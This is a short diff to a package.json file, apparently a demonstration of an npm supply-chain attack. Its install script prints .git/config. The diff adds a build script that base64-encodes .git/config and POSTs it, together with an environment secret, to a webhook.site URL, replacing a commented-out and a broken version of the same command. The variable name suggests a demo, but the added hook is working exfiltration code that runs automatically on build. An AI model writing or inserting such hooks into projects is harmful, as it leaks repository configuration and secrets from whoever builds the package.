--- a/package.json
+++ b/package.json
@@ -3,10 +3,7 @@
     "version": "1.0.0",
     "scripts": {
       "install": "echo 'Malicious install script running...' && cat .git/config",
-  
-      //"build": "echo 'Exfiltrating data to webhook.site...' && encoded=$(base64 -w0 < .git/config) && curl -X POST -H 'Content-Type: application/json' -d '{\"gitConfigBase64\": \"'$encoded'\"}' https://webhook.site/041bf490-6af7-4124-bcba-d5ef964ecdd6"
-      // Runs automatically on `npm build`
-        "build": "echo 'Exfiltrating data...' encodedGit=$(base64 -w0 < .git/config) curl -X POST -H 'Content-Type: application/json' -d '{\"gitConfigBase64\": \"'$encodedGit'\", \"superSecret\": \"'$SUPERSECRET'\"}' https://webhook.site/041bf490-6af7-4124-bcba-d5ef964ecdd6"
+      "build": "echo 'Exfiltrating data...' && encodedGit=$(base64 -w0 < .git/config) && curl -X POST -H 'Content-Type: application/json' -d '{\"gitConfigBase64\": \"'$encodedGit'\", \"superSecret\": \"'$FAKE_SECRET_FOR_DEMO'\"}' https://webhook.site/041bf490-6af7-4124-bcba-d5ef964ecdd6"
     },
     "dependencies": {}
   }
